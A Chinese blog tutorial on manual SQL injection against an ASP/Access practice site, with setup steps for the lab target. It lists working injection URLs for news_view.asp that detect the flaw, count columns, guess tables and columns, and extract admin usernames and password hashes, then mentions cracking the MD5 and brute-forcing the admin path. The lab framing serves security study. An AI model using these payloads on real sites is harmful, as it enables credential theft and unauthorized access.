ACCESS手工注入(附带环境搭建教程)

已于 2024-08-20 20:36:51 修改
阅读量305 收藏 14
点赞数 12
文章标签: 数据库 sql
于 2024-08-20 19:49:01 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_78031880/article/details/141366965
版权

 一。ACCESS手工注入(附带环境搭建教程)

1.环境搭建

链接:https://pan.baidu.com/s/1EIqzANoJcA70htoG5m3RMw?pwd=x31a 
提取码:x31a

(1)进入百度网盘下载文件

(2)将环境附件压缩下放到www根目录

265fe4bf1a834fe88fb108b42b892e68.png

(3)访问iis服务器绑定的ip地址即可访问到网站靶场

5fb8e79cd4bc4849ab07fd97bf067470.png

2.手工注入流程

(1)判断注入点

news_view.asp?id=11' //报错

news_view.asp?id=11 and 1=1 //正常

news_view.asp?id=11 and 1=2 //错误

dbd984e0797e4caf8b5d500f8a643bbe.png

772ca4ac8c1a4f1b8eafec22909e1c2f.png

b70b4acfbb8b4305be311cec51bc3f19.png

 

 

 

(2)order by判断列数 当order by 7的时候⻚⾯正常 order by 8的时候⻚⾯报错 说明有7个字段

news_view.asp?id=11 order by 7 //⻚⾯正常.

news_view.asp?id=11 order by 8 //⻚⾯报错,说明有7列.

70cd50ca6fd3452890dc5932f3228854.png

9a219489b0ac410492262a480f2a79e4.png

(3).猜表。

news_view.asp?id=11 and exists(select * from 表名) //判断某个表是否存在

news_view.asp?id=11 and exists(select * from admin) //从admin表中查询数据,页面不正常,说明 不存在admin表 、

news_view.asp?id=11 and exists(select * from users) //从users表中查询数据,页面不正常,说明 不存在admin表

news_view.asp?id=11 and exists(select * from administrator) //从administrator表中查询数据,页面正常,说明查到数据了

ed8d01af87594bef95673f1d76e953c5.png

 7028ef9148d44592be5928849fda7a8b.png

c5ca0e11d4774f238da2073dc03df15f.png

 

(4)判断回显位置

news_view.asp?id=11 union select 1,2,3,4,5,6,7 //页面报错,不符合access语法,

select 列 from 表

news_view.asp?id=11 union select 1,2,3,4,5,6,7 from administrator //页面正常

1217c739fd564cad892da39863abd248.png

da6ac14918ad49be83d690f9830ac008.png

(5)猜字段名 可能的字段名有 username user_name user ,password passwd pwd pass_wd pass_word admin_name admin_username admin_user admin_passwd admin_pwd ..........

 

news_view.asp?id=14 union select 1,username,3,4,5,6,7 from administrator // 报错,说明没有username列

news_view.asp?id=14 union select 1,user_name,3,4,5,6,7 from administrator //正常,说明存在这⼀列

然后去回显点3查询密码列

news_view.asp?id=14 union select 1,user_name,password,4,5,6,7 from administrator //成功查到密码

6d37faa8f20d4c19ac52fa59c7145dd6.png

c1d6a5f2d7bd4fe1ae36e4b31991136c.png

46cd165e38464002a1ab2acc5a6cbbd0.png

(6)密码进⾏md5解密 并去后台登录 后台地址爆破⼀下

2858fa28fa7548da81de06173cf0e42d.png

5ddd8b5f08ad491d8fe7146df26d7dd1.png

a16d9584929f4abbb92b32f78f6ed853.png

 

谪仙123
关注
  • 12
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
图文详解PHP环境搭建教程
10-21
【PHP环境搭建教程】 PHP(Hypertext Preprocessor)是一种广泛应用的开源脚本语言,尤其适合Web开发。自1995年由Rasmus Lerdorf创建以来,PHP经历了长期发展,成为了全球开发者首选的服务器端编程语言之一。PHP5...
SQL环境搭建教程
03-20
SQL环境搭建教程 目录: (一) SQL安装常识 (二)什么是"附加数据库"和新"建立数据库"以及的区别 (三)数据库导入与导出 (四)数据库收缩与分离 (五)数据库备份/还原 (六)(安装常见错误 (七)如何测试SQL (八)ACCESS转化...
各种数据库注入
最新发布
2301_78031880的博客
08-20 392
(5)猜字段名 可能的字段名有 username user_name user ,password passwd pwd pass_wd pass_word admin_name admin_username admin_user admin_passwd admin_pwd ..........news_view.asp?Order by是数据库查询的时候对结果进⾏的排序,如果后⾯写的是字段,则根据查询字段进⾏排序, 但如果后⾯写的是数字,该数字⼤于所查询的字段数,则就会报错,⼩于的话就不会报错。
米桃安全漏洞讲堂系列第1期:SQL注入漏洞
zcdy810的专栏
02-01 1192
本文讲述了信息安全中,sql注入漏洞的概念、分类、测试方法及企业防御措施
教程】Gentoo的安装
赵翔的专栏
08-06 2万+
Gentoo Linux x86手册 内容: 安装Gentoo 在这部分中,你将学习如何在你的系统中安装Gentoo。 关于如何安装Gentoo Linux 本章介绍了本手册所讲解的安装方式。选择合适的安装方式 你可以用许多方法安装Gentoo。本章讲解怎样用
这一年,这些书:2022年读书笔记
热门推荐
Heartsuit的博客
12-31 3万+
Note: 以下 `markdown` 格式文本由 `json2md` 自动转换生成,可参考[JSON转Markdown:我把阅读数据从MongoDB中导出转换为.md了](https://blog.csdn.net/u013810234/article/details/113360229)了解具体的转换过程。2022年读书笔记
Access 基础篇教程.pdf,适合Access学习使用
10-26
教程Access 基础篇教程》显然旨在为初学者提供一个全面了解和学习Access的基础知识平台。 在学习Access之前,首先要理解数据库的基本概念,包括数据表、字段、记录和键等。Access允许用户通过用户友好的界面...
SQL手工注入大全:包含各种类型的SQL注入,实现手工注入的乐趣,此资源你值得拥有。
05-31
此资源包含:宽字节注入SQL手工注入漏洞测试(Oracle数据库)、SQL手工注入漏洞测试(Sql Server数据库)、SQL手工注入漏洞测试(Access数据库)、SQL手工注入漏洞测试(PostgreSQL数据库)、SQL手工注入漏洞测试(MongoDB...
整理比较全的Access SQL注入参考
09-14
Access SQL 注入参考 Access SQL 注入数据库安全领域中的一种常见的攻击手法,通过向 Access 数据库注入恶意的 SQL 代码,攻击者可以读取、修改或删除敏感数据。本文档旨在整理 Access SQL 注入的相关知识点,...
webjs 数据库 离线读取本地数据库源码-SAAS 本地化及未来之窗行业应用跨平台架构
cybersnow精通 28 门计算机语言,凭借其超凡的技术能力,成功开发过上万个应用,广泛涉及政府、商业、个人等众多领域,甚至在检察院、环保局、公安局等专业场景中也大放异彩。不仅熟练掌握单片机和物联网开发,在软件架构设计方面更是独树一帜,自创了跨平台软件
08-15 275
【代码】webjs 数据库 离线读取本地数据库源码-SAAS 本地化及未来之窗行业应用跨平台架构。
linux安装达梦数据库
HAN_789的博客
08-19 111
如果无法创建dmdba 文件夹,需要进入root用户下 在管理员用户下,这种安装方式一般只用于验证,开发,测试,生产最好还是安装传统的方式安装。在 home/dmdba/dmdbms/bin 目录下执行。(1)将文件上传到 /home/dmdba/ 目录下。(2)加压:tar -xzvf dmdb.tar.gz。进入到root就可以创建dmdba 文件夹了。1、后台启动,一般建议用后台启动。
网上商品订单转手系统bootpf
weixin_43213064的博客
08-18 463
【代码】springboot网上商品订单转手系统bootpf
mysql介绍
weixin_57763462的博客
08-14 404
丰富的存储引擎:MySQL 提供了多种存储引擎,如 InnoDB、MyISAM、Memory 等,每种存储引擎都有其特定的应用场景和优势。多语言支持:MySQL 支持多种编程语言,包括 C、C++、Python、Java、Perl、PHP 等,并提供了相应的 API。安全性:MySQL 提供了灵活的权限和密码系统,支持基于主机的验证,并且所有的密码传输都采用加密形式,确保了数据的安全性。管理工具:MySQL 提供了丰富的管理工具,如命令行客户端、图形界面管理工具等,方便用户进行数据库的管理和维护。
旅游网站
weixin_43213064的博客
08-16 1105
【代码】springboot旅游网站
【Python使用】嘿马头条项目从到完整开发教程第1篇:简介,1. 内容【附代码文档】
一诺的博客
08-16 627
教程的知识点为:简介 1. 内容 2. 目标 产品效果 ToutiaoWeb虚拟机使用说明 数据库 理解ORM 作用 思考: 使用ORM的方式选择 数据库 SQLAlchemy操作 1 新增 2 查询 all() 数据库 分布式ID 1 方案选择 2 头条 使用雪花算法 (代码 toutiao-backend/common/utils/snowflake) 数据库 Redis 1 Redis事务 基本事务指令 Python客户端操作 Git工用流 调试方法 JWT认证方案 JWT & JWS & JWE
[PHP]-Laravel中Group By引发的问题思考
hmx224_2014的专栏
08-16 504
Laravel 和 ThinkPHP 是两个不同的 PHP 框架,它们在底层使用了相同的 SQL 查询语言来与数据库交互。然而,由于框架的设计和实现方式不同,它们在生成 SQL 查询时可能会表现出一些细微的差异,包括对GROUP BY 子句的处理。在调用查询公司在线报告接口时,发现我请求的数据室20条每页,但是经查询存在16,17条的都有,并且后几页也不稳定,就一直查询问题。
企业架构MySQL读写分离
A1357924680_的博客
08-16 835
DAU : 2000 (每日活跃⽤户数) 之前业务中是单台 MySQL 提供服务,使用多台MySQL数据库务器,降低单台压力,实现集群架构的稳定性和高可用性 数据的一致性 完整性 replication通过业务比对和分析发现,随着活跃用户数增多,读取数据的请求变多,故着重解决读取数据的压力。基于主从复制的基础上,常见的数据库负载均衡使用的是读写分离方式。在业务代码中,数据库的操作,不直接连接数据库,而是先请求到中间件服务器(代理)由代理服务器,判断是读操作去从数据服务器,写操作去主数据服务器。
实训day21
2201_75673097的博客
08-17 821
uid=997(mysql) gid=994(mysql) 组=994(mysql)2、为root账户刷新权限。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值